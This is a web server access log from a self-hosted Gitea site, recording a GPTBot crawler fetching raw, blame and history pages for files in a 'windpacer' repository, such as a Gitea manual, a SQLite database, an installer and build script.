"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23046] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23017] [Gzip 10.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" +[17/Feb/2026:14:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23042] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" +[17/Feb/2026:14:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23042] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 10838] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:14:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:14:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9461] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 11113] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:14:11:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:14:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12570] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" +[17/Feb/2026:14:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:11:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" +[17/Feb/2026:14:11:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" +[17/Feb/2026:14:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 11994] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" +[17/Feb/2026:14:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9462] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" +[17/Feb/2026:14:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:14:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" +[17/Feb/2026:14:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14350] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" +[17/Feb/2026:14:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 11099] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23041] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12570] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" +[17/Feb/2026:14:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10838] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest" +[17/Feb/2026:14:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14351] [Gzip 27.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/my_database.db" +[17/Feb/2026:14:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" +[17/Feb/2026:14:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" +[17/Feb/2026:14:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] 